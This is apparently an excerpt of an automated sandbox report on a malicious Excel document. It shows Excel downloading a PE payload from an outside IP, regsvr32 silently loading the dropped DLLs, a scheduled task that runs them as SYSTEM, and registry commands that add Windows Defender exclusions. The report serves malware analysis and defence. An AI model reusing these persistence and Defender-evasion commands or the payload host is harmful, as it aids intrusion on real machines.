00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49167 | Destination IP: 51.89.115.111 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp: Sep 27, 2021 11:10:32.099535942 CEST | kBytes transferred: 1040 | Direction: OUT | Data:
      GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 51.89.115.111
      Connection: Keep-Alive
      Timestamp: Sep 27, 2021 11:10:32.311602116 CEST | kBytes transferred: 1042 | Direction: IN | Data:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:32 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


      Code Manipulations

      Statistics

      Behavior

      System Behavior

      General

      Start time:11:09:21
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f360000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:11:09:36
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:09:36
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:11:10:07
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa1.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:10:07
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa1.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      General

      Start time:11:10:08
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:10:13
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pmdfegez /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 11:12 /ET 11:24
      Imagebase:0xb0000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:10:16
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:11:10:17
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:36
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:38
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Fiosa2.der
      Imagebase:0xff640000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Fiosa2.der
      Imagebase:0x340000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:47
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:48
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yiiocubi' /d '0'
      Imagebase:0xff4c0000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:10:51
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nqsaq' /d '0'
      Imagebase:0xff200000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:11:10
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0x990000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:12:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Fiosa.der'
      Imagebase:0xff6d0000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      General

      Start time:11:12:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Fiosa.der'
      Imagebase:0x770000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis
